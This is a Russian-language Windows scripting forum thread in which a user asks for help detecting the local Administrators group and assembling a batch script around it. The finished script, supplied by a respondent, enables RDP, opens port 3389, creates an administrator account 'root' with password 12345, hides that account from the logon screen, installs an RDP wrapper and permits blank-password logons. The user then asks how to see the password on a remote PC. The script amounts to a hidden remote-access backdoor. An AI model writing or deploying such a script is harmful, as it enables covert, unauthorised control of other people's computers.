Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Скриптовые языки администрирования Windows (http://forum.oszone.net/forumdisplay.php?f=102)
-   -   [решено] автоматически определять группу администраторов на любой системе (http://forum.oszone.net/showthread.php?t=329080)

DetFedot 14-08-2017 20:06 2758333
автоматически определять группу администраторов на любой системе
 
Нужно сделать код какой будет автоматически определять группа администраторов на любой системе.

Iska 14-08-2017 20:29 2758337
Well-known security identifiers in Windows operating systems
Код:
@echo off
setlocal enableextensions enabledelayedexpansion

for /f "usebackq delims=" %%i in (
        `wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i

if defined sAdminGroupName (
        echo [%sAdminGroupName%]
)

endlocal
exit /b 0

DetFedot 14-08-2017 20:45 2758341
А как его можно совместить с RDP
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
net user root /add
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Iska 14-08-2017 21:23 2758349
Код:

if defined sAdminGroupName (
        net.exe localgroup "%sAdminGroupName%" "root" /add
)

DetFedot 14-08-2017 22:25 2758358
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
if defined sAdminGroupName ( net.exe localgroup "%sAdminGroupName%" "root" /add)
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
Примерно должно так получится

Iska 14-08-2017 22:30 2758359
Цитата:
Цитата DetFedot
Примерно должно так получится »
Если это утверждение — то оно неверное. Если вопрос — то на выбор два ответа: «Не должно» и «Не так».

DetFedot 14-08-2017 22:33 2758360
А можете помочь как мне его луче поместить в код чтоб он работал

Iska 14-08-2017 23:13 2758364
Код:
@echo off
setlocal enableextensions enabledelayedexpansion

for /f "usebackq delims=" %%i in (
        `wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp"    /t REG_DWORD /d 1 /f

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

net.exe user "root" "12345" /add

if defined sAdminGroupName (
        net.exe localgroup "%sAdminGroupName%" "root" /add
)

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "root" /t REG_DWORD /d 0 /f

"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

endlocal
exit /b 0

DetFedot 15-08-2017 00:44 2758385
А может тогда помочь реализовать и другой RDP код
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Iska 15-08-2017 01:07 2758387
DetFedot, поясните Вашу мысль.

DetFedot 15-08-2017 01:33 2758391
А можно сделать так чтоб сохранялся txt документ с паролем от пользователя в коде

Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w

Iska 15-08-2017 01:38 2758394
DetFedot, сожалею, но не могу понять, чего именно Вы хотите. Подождите коллег, у них легче с этим.

DetFedot 15-08-2017 01:56 2758397
Я просто хочу понять как можно сделать так чтоб пароль можно было увидеть какой стоит на удаленом ПК

Busla 15-08-2017 10:10 2758432
DetFedot, никак - пароль явно не хранится


Время: 01:20.

Время: 01:20.
© OSzone.net 2001-